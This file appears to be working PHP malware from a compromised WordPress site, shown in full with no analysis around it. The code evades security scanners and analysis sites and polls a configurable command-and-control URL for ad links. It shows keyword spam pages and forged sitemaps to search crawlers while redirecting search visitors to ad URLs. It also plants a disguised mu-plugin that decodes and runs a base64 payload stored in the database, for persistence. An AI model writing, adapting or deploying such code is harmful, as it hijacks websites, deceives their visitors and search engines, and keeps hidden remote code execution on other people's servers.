File: //tmp/wpc_aYeDKI
<?php
$ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? "");
$ref = strtolower($_SERVER["HTTP_REFERER"] ?? "");
$path = strtolower($_SERVER["REQUEST_URI"] ?? "/");
$domain = $_SERVER["HTTP_HOST"] ?? "localhost";
// Skip wp-admin entirely
if (strpos($path, "wp-admin") !== false || strpos($path, "wp-login") !== false) return;
// Load config
$cfg = json_decode(get_option("_wpc_feed_mod_cache"), true);
if (!$cfg || empty($cfg["on"])) return;
// Block scanners
$bad = ["curl","wget","python","semrush","ahrefs","sucuri","wordfence","malcare","scanner","crawler"];
foreach ($bad as $b) { if (strpos($ua, $b) !== false) return; }
if (empty($ua)) return;
// Block debug referrers
$dbg = ["wp-admin","administrator","search-console","virustotal","urlscan"];
foreach ($dbg as $d) { if (strpos($ref, $d) !== false) return; }
// C2 check (if configured)
if (!empty($cfg["c2"])) {
$r = @wp_remote_get($cfg["c2"], ["timeout" => 3]);
if (!is_wp_error($r)) {
$rc = json_decode(wp_remote_retrieve_body($r), true);
if ($rc && isset($rc["active"])) {
if (!$rc["active"]) return;
if (!empty($rc["ads"])) {
$cfg["ads"] = $rc["ads"];
update_option("_wpc_feed_mod_cache", json_encode($cfg));
}
}
}
}
// ── ROBOTS.TXT ──
if (strpos($path, "robots.txt") !== false) {
$proto = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off") ? "https://" : "http://";
header("Content-Type: text/plain");
echo "User-agent: *\nAllow: /\n\nSitemap: {$proto}{$domain}/sitemap.xml\n";
exit;
}
// ── SITEMAP.XML ──
if (strpos($path, "sitemap") !== false && strpos($path, ".xml") !== false) {
$kw_data = json_decode(get_option("_wpc_timeout_theme_roots"), true);
if ($kw_data && !empty($kw_data["links"])) {
$proto = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off") ? "https://" : "http://";
header("Content-Type: application/xml; charset=UTF-8");
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
echo "<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
foreach ($kw_data["links"] as $link) {
echo " <url><loc>{$proto}{$domain}{$link}</loc>";
echo "<lastmod>" . date("Y-m-d") . "</lastmod>";
echo "<changefreq>daily</changefreq><priority>0.8</priority></url>\n";
}
echo "</urlset>";
exit;
}
}
// ── BOT → SEO PAGE ──
$bots = ["googlebot","bingbot","yandex","baiduspider","duckduckbot","applebot"];
$is_bot = false;
foreach ($bots as $b) { if (strpos($ua, $b) !== false) { $is_bot = true; break; } }
if ($is_bot) {
$kw_data = json_decode(get_option("_wpc_timeout_theme_roots"), true);
if (!$kw_data) return;
$matched = null;
foreach ($kw_data["keywords"] as $kw => $data) {
if (strpos($path, $kw) !== false) { $matched = $data; break; }
}
if (!$matched) $matched = reset($kw_data["keywords"]);
$links_html = "";
if (!empty($kw_data["links"])) {
$shuffled = $kw_data["links"];
shuffle($shuffled);
foreach (array_slice($shuffled, 0, 6) as $link) {
$text = ucwords(str_replace(["-","/"], " ", trim($link, "/")));
$links_html .= "<li><a href=\"$link\">$text</a></li>";
}
}
header("HTTP/1.1 200 OK");
header("Content-Type: text/html; charset=UTF-8");
echo "<!DOCTYPE html><html lang=\"en\"><head>";
echo "<title>{$matched["title"]}</title>";
echo "<meta name=\"description\" content=\"" . substr($matched["body"], 0, 160) . "\">";
echo "<link rel=\"canonical\" href=\"https://{$domain}{$path}\">";
echo "</head><body>";
echo "<h1>{$matched["title"]}</h1>";
echo "<p>" . date("F j, Y") . " — by Support Team</p>";
echo "<p>{$matched["body"]}</p>";
if ($links_html) echo "<h2>Related Solutions</h2><ul>{$links_html}</ul>";
echo "</body></html>";
exit;
}
// ── SEARCH USER → REDIRECT ──
$ses = $cfg["search_engines"] ?? ["google.","bing.","yahoo.","yandex.","duckduckgo."];
$from_search = false;
foreach ($ses as $se) { if (strpos($ref, $se) !== false) { $from_search = true; break; } }
if ($from_search && strpos($ua, "bot") === false) {
$mode = $cfg["redirect_mode"] ?? "once";
$ads = $cfg["ads"] ?? [];
if (empty($ads)) return;
if ($mode === "always") {
// Redirect every single visit — no cookie check
wp_redirect($ads[array_rand($ads)]);
exit;
} elseif ($mode === "session") {
// Once per browser session (session cookie, expires when browser closes)
$ck = "__ga_sid";
if (isset($_COOKIE[$ck])) return;
setcookie($ck, "1", 0, "/"); // 0 = session cookie
wp_redirect($ads[array_rand($ads)]);
exit;
} else {
// Default: once per X hours (cookie-based)
$hours = intval($cfg["cookie_hours"] ?? 24);
$ck = "__ga_cache";
$cv = md5($_SERVER["REMOTE_ADDR"] . date("Y-m-d-H") . floor(date("H") / max(1,$hours)));
if (isset($_COOKIE[$ck]) && $_COOKIE[$ck] === $cv) return;
setcookie($ck, $cv, time() + ($hours * 3600), "/");
wp_redirect($ads[array_rand($ads)]);
exit;
}
}
// ── SELF-HEAL (5% of requests) ──
if (mt_rand(1, 20) === 1) {
$opt = "_wpc_theme_manifest_cache";
$mu_dir = defined("WPMU_PLUGIN_DIR") ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . "/mu-plugins";
$mu_file = $mu_dir . "/cache-loader.php";
if (!file_exists($mu_file)) {
@mkdir($mu_dir, 0755, true);
$mc = "<?php\n// Database cache optimization layer\n";
$mc .= "\$_c = get_option(\"" . $opt . "\");\n";
$mc .= "if (is_string(\$_c) && strlen(\$_c) > 50) { \$t = tempnam(sys_get_temp_dir(),\"wp_\"); file_put_contents(\$t, base64_decode(\$_c)); include \$t; @unlink(\$t); }\n";
@file_put_contents($mu_file, $mc);
}
}